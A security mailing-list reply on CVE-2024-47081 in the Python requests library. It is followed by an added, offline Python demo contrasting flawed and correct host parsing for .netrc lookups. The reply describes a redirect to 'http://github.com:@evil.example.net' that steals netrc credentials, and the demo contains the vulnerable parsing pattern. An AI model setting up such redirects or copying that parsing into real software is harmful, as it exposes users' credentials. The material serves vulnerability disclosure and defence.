Message-ID: <20250604171812.y354hq4gte6omh7e@jwilk.net>
Date: Wed, 4 Jun 2025 19:18:12 +0200
From: Jakub Wilk <jwilk@...lk.net>
To: oss-security@...ts.openwall.com
Subject: Re: CVE-2024-47081: Netrc credential leak in PSF requests library

* Alan Coopersmith <alan.coopersmith@...cle.com>, 2025-06-03 10:09:
>I'm not sure how the attacker is supposed to get the victim to make a 
>requests call using a URL the attacker controls

The attacker could set up a public HTTP server at 
<http://evil.example.net/> that redirects (via HTTP 302) everything to, 
say, <http://github.com:@evil.example.net>. Then they would only need to 
wait patiently for a visit from a robot that has requests under the 
hood.


* Juho Forsén, 2025-05-31 06:30:
>As a workaround, clients may explicitly specify the credentials used on 
>every API call to disable .netrc access.

I'm not aware of any good way to disable netrc support in requests:
https://github.com/requests/requests/issues/2773

In particular, AFAICT something like 

     requests.get("http://evil.example.net/", auth=("", ""))

(that was alluded to by Juho) doesn't help in the presence of redirects. 
The redirected URL would still be fetched with netrc auth.

-- 
Jakub Wilk
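Added example (not code from the post's author or from the requests project): the redirect target quoted above, <http://github.com:@evil.example.net>, only leaks credentials if the client derives the netrc "machine" name from the URL incorrectly. The snippet below writes a constructed .netrc with a placeholder token for github.com to a temporary file, then compares a flawed host extraction (splitting the netloc on ":" to drop a port, which also splits on the userinfo separator) against `urllib.parse`'s `hostname`, which strips userinfo and port correctly. The .netrc content, the token and the helper names are all constructed for illustration.

```python
"""Why a host-extraction mistake turns a redirect into a .netrc leak.

Constructed illustration for the oss-security thread on CVE-2024-47081;
uses only the standard library so it runs offline.
"""
import netrc
import os
import tempfile
from urllib.parse import urlparse

# Constructed .netrc entry; the password is a placeholder, not a real secret.
NETRC_TEXT = "machine github.com login octocat password PLACEHOLDER_TOKEN\n"

# The redirect target quoted in the thread.
REDIRECT_TARGET = "http://github.com:@evil.example.net/"


def naive_host(url):
    """Flawed pattern: strip a port by splitting netloc on ':'.

    netloc still contains any userinfo ('user:pass@'), so for
    'github.com:@evil.example.net' this returns 'github.com', and a
    .netrc lookup keyed on it hands github.com's credentials to the
    attacker-controlled host.
    """
    return urlparse(url).netloc.split(":")[0]


def safe_host(url):
    """Correct pattern: urlparse().hostname drops userinfo and port."""
    return urlparse(url).hostname


def netrc_auth_for(url, netrc_path, host_fn):
    """Return the (login, password) a .netrc lookup keyed on host_fn(url)
    would attach to the request, or None if no entry matches."""
    host = host_fn(url)
    if not host:
        return None
    entry = netrc.netrc(netrc_path).authenticators(host)
    if entry is None:
        return None
    login, _account, password = entry
    return (login, password)


def write_constructed_netrc():
    """Write the constructed .netrc to a temp file and return its path."""
    fd, path = tempfile.mkstemp(suffix=".netrc")
    with os.fdopen(fd, "w") as fh:
        fh.write(NETRC_TEXT)
    os.chmod(path, 0o600)
    return path


def demo(url=REDIRECT_TARGET):
    """Compare what each host-extraction strategy would send to `url`."""
    path = write_constructed_netrc()
    try:
        return {
            "naive": netrc_auth_for(url, path, naive_host),
            "safe": netrc_auth_for(url, path, safe_host),
        }
    finally:
        os.unlink(path)


if __name__ == "__main__":
    for strategy, creds in demo().items():
        print(f"{strategy:>5}: {'no credentials' if creds is None else creds}")
```

For the quoted URL the naive strategy resolves to github.com and would send the placeholder login and token to evil.example.net, while the hostname-based lookup finds no entry. As a client-side mitigation independent of the library fix, requests gates its netrc lookups (including the one performed on redirect) on `Session.trust_env`, so a session with `trust_env = False` skips them, at the cost of also ignoring proxy environment variables and `REQUESTS_CA_BUNDLE`.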
